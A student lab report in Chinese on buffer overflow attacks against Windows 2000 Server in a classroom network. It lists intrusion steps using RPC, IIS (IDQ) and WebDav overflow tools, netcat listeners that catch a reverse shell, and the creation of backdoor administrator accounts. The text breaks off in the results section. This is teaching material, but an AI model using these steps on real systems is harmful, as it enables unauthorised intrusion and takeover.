实验报告四 缓冲区溢出攻击(安徽农业大学).pdfVIP

实验报告四缓冲区溢出攻击(安徽农业大学)--第1页

实验四缓冲区溢出攻击

姓名：学号：班级：2班

实验组别：同组实验者姓名：

指导教师：章恒日期：成绩：

【实验报告要求】

1．简述缓冲区溢出攻击的基本原理。

2．利用RPC漏洞溢出入侵一台操作系统是Windows2000Server的计算机，写出基本步骤。

3．利用IIS溢出入侵一台操作系统是Windows2000Server的计算机，在该计算机上新增

用户test，密码为123456，并将test用户添加到管理员组，写出基本步骤。

4．利用WebDav远程溢出入侵一台操作系统是Windows2000Server的计算机，在该计算

机上新增用户hacker，密码为123456，并将hacker用户添加到管理员组，写出基本步

骤。

5．写出上述三种入侵方法的总结报告。

实验步骤与调试过程：1．RPC漏洞出。首先调用RPC（RemoteProcedureCall)。当

系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务。利用

RPC漏洞建立超级用户。首先，把scanms.exe文件拷贝到C盘跟目录下，检查地址段

172.18.25.109到172.18.25.11。点击开始运行在运行中输入cmd确定。进入DOs模

式、在C盘根目录下输入scanms.exe172.18.25.109-172.18.25.110,回车。检查漏洞。

2．检查缓冲区溢出漏洞。利用工具软件attack.exe对172.18.25.109进行攻击。在进入

DOC模式、在C盘根目录下输入acctack.exe172.18.25.109,回车。

3．3,利用软件SnakeIIS溢出工具可以让对方的IIS溢出。进入IIS溢出工具软件的主界

面.IP:172.18.25.109PORT:80监听端口为813单击IDQ溢出。出现攻击成功地提示对

话框。

4．利用工具软件nc.exe连接到该端口。进入DOs模式，在C盘根目录下输入nc.exe-vv

172.18.25.109813回车。

5．监听本地端口（1）先利用nc.exe命令监听本地的813端口。进入DOs模式，在C

盘根目录下输入nc-l-p813回车。（2）这个窗口就这样一直保留，启动工具软件snake，

本地的IP地址是172.18.25.110，要攻击的计算机的IP地址是172.18.25.109，选择溢出

选项中的第一项，设置IP为本地IP地址，端口是813.点击按钮“IDQ溢出”。（3）查

看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令。将对方计算机的C

盘根目录列出来，进入DOC模式，在C盘根目录下输入nc-l-p813回车。

6．利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。（1）在DOS

1

实验报告四缓冲区溢出攻击(安徽农业大学)--第1页

实验报告四缓冲区溢出攻击(安徽农业大学)--第2页

命令行下执行webdavx3.exe，进入DOC模式，在C盘根目录下输入webdavx3.exe

172.18.25.109回车。（2）nc.exe程序入侵对方的计算机进入DOC模式，在C盘根目录

下输入nc-vv172.18.25.1097788回车。

实验结果：

1．成功加载RP